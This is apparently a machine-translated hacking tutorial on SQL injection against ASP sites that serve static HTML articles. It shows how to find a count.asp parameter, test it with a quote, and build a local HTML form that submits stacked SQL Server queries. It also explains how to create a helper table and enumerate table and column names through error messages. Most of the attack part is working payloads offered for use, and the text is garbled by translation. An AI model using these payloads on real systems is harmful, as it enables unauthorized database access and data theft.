Have you ever encountered such a website:
The full-site article system uses the FSO static html file for display.
This can reduce the server load and increase the access speed.
Second, it also blocked SQL injection attacks ..
Let me talk about their article system principles:
All articles have a copy in the database. In addition, an HTML page is generated based on the template.
Attack method:
Check the source file/check whether there is a page called through Js.
For example, call <script language = "JavaScript" src = "count. asp? Id = 1552 "> </SCRIPT> to update the browsing times of an article.
We can try to see if injection is possible:
Http: // server domain name/count. asp? Id = 1552'
Check whether an error occurs. If an error occurs, the injection vulnerability exists.
Then the attack is normal.
Create a post.htmfile and a log.txt text file on the local machine (this is a good habit)
Post.htm content: easy to input.
<IFRAME name = P src = # width = 800 Height = 350 frameborder = 0> </iframe>
<Br>
<Form action = http://test.com/count.asp target = P>
<Input name = "ID" value = "1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 ); -- "style =" width: 750 ">
<Input type = submit value = ">>>">
<Input type = hidden name = fno value = "2, 3">
</Form>
The SQL Server server can be judged as follows: add a semicolon after 1552. If it is normal, it may be SQL Server.
For such databases, You can first create a table id = 1552; Create Table AAA (AAA char (20 ));--
Insert a record: Id = 1552; insert into AAA values ('test ');--
Next, I will name his data table:
Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 );--
This is to update the first table name to the AAA field.
Id = 1552 and exists (select * from AAA where AAA> 5) will report an error. In most cases, the table name will be read directly: see:
Microsoft ole db provider for SQL Server Error '80040e07'
A syntax error occurs when the varchar value 'Vote' is converted to a column whose data type is int.
/Search. asp, row 21
Here, vote is the table name:
You can also guess a table name first, and then update the values of (select top 1 name from sysobjects where xtype = 'U' and status> 0) to a record of that table. Display on the webpage.
Read the first table, and the second table can be read as follows (ADD and name <> 'table name just obtained 'After the condition ').
Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name <> 'Vote ');--
Then Id = 1552 and exists (select * from AAA where AAA> 5)
Read the second table and read it one by one until it does not exist.
The read field is as follows:
Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 1 ));--
Then Id = 1552 and exists (select * from AAA where AAA> 5) error.
Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 2 ));--
Then Id = 1552 and exists (select * from AAA where AAA> 5) error.
...... And so on